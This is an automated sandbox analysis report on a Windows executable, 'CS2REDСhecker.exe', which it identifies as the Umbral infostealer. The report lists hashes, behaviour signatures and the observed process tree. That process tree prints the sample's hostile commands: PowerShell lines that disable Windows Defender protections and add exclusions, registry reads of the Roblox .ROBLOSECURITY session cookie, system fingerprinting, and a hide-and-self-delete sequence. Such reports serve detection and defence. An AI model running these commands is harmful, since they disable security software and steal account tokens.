Analysis

  • max time kernel
    132s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    03-07-2024 14:24

General

  • Target

    CS2RED' Programs/CS2REDСhecker.exe

  • Size

    229KB

  • MD5

    8171222317c30d31448205d70bca990f

  • SHA1

    574d07820d3cb49c60a29defe88675072b9ae977

  • SHA256

    d7a96d169d8c99e83b7a4eb920b8934cedeaa0ce1619d0cc677a83e0556ca2c2

  • SHA512

    3a7f30a04f843294775b2501b9f51e4f2d2af4a834fa573791dcb2556526f4b834ac019bebab3fb9f062dd3012328cc2ea75db87df32d9b23346e2c495267e80

  • SSDEEP

    6144:lloZM+rIkd8g+EtXHkv/iD45S4Uhv0IH+2PxM4d5Zb8e1m4i:noZtL+EP85S4Uhv0IH+2PxM4dLq

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 32 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe
    "C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1976
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3000
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe"
      2⤵
      • Views/modifies file attributes
      PID:2696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2284
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2616
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2520
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1176
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:1764
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:1000
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:484
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:1356
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\CS2RED' Programs\CS2REDСhecker.exe" && pause
          2⤵
          • Deletes itself
          • Suspicious use of WriteProcessMemory
          PID:2808
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • Runs ping.exe
            PID:2220
      • C:\Windows\system32\taskmgr.exe
        "C:\Windows\system32\taskmgr.exe" /4
        1⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1148

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        fe0b1c68b1edd8a34f4a66bee44e2514

        SHA1

        35593eb56bcd65caab8e2d8b01830129bb9759b6

        SHA256

        0a6849f4de47045cf55b7015b1b847c784f501dafba9cf1af1da8ba62767fd30

        SHA512

        dbc28d4b54f04aecb3b5d9b670e0870c6367acf36a55a5a44cb6a539d5dfe47fe78f064ad3b9c22d2e735bb988ae5889041a54d7a01a743215a07c93d20499d7

      • memory/484-44-0x0000000002040000-0x0000000002048000-memory.dmp

        Filesize

        32KB

      • memory/1148-50-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

      • memory/1148-49-0x0000000140000000-0x00000001405E8000-memory.dmp

        Filesize

        5.9MB

      • memory/1976-1-0x00000000000C0000-0x0000000000100000-memory.dmp

        Filesize

        256KB

      • memory/1976-2-0x000007FEF5860000-0x000007FEF624C000-memory.dmp

        Filesize

        9.9MB

      • memory/1976-0-0x000007FEF5863000-0x000007FEF5864000-memory.dmp

        Filesize

        4KB

      • memory/1976-48-0x000007FEF5860000-0x000007FEF624C000-memory.dmp

        Filesize

        9.9MB

      • memory/2284-7-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

        Filesize

        2.9MB

      • memory/2284-8-0x00000000028E0000-0x00000000028E8000-memory.dmp

        Filesize

        32KB

      • memory/2616-15-0x0000000001FD0000-0x0000000001FD8000-memory.dmp

        Filesize

        32KB

      • memory/2616-14-0x000000001B810000-0x000000001BAF2000-memory.dmp

        Filesize

        2.9MB